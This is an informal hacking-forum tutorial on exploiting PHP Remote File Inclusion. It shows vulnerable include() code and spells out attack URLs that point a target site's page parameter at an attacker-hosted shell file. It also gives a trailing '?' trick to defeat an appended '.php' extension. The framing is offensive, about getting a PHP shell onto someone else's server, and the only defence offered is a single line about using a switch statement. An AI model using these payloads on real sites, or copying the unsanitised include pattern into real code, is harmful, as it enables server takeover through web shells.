RFI = Remote File Inclusion

 Basically RFI is a method of getting your cleverly coded PHP shell onto a server. First off we will take a look at the code that allows us to use this vulnerability.

<?php
 $page = $_GET['page'];
 include($page);
 ?>

 This code can be arranged several different ways, but it comes down to not limiting user input. To eliminate this problem, use a switch statement to make sure they can only choose the ones given.

 But, since you cannot view the PHP to a webpage, we are going to have to detect it some other way. To do this, the targets URL must look something like this;

http://www.slave.com/index.php?page=main.php

 The "?page" can be replace with any sort of variable really. If the site URL looks like this, they might be vulnerable to RFI.

 Try manipulating the page variable to be something else such as;

http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt

 You can replace the "http://www.yoursite.com/yourshell.txt" with a shell of your choice. If it doesn't work, there is a way you can possibly fix it.
 The code might look something like this;

<?php
   $file =$_GET['page'];
   include($file .".php");
 ?>

 This makes whatever is inputted to be treated as a PHP file. If this happens, your shell will not execute. For any shell to work, it must be in ".txt" form.
 To eliminate this nuisance, we modify our URL manipulation slightly to look like this;

http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt?

 The "?" at the end, makes it so that the shell does not get all fucked up by the ".txt.php" crap at the end, and your final URL will look like this;

http://slave.com/index.php?page=http://www.yoursite.com/yourshell.txt?.php

 Which makes it so that the ".php" does not screw up your shell
 =========================================================

Credits: Vlatko from Hackforums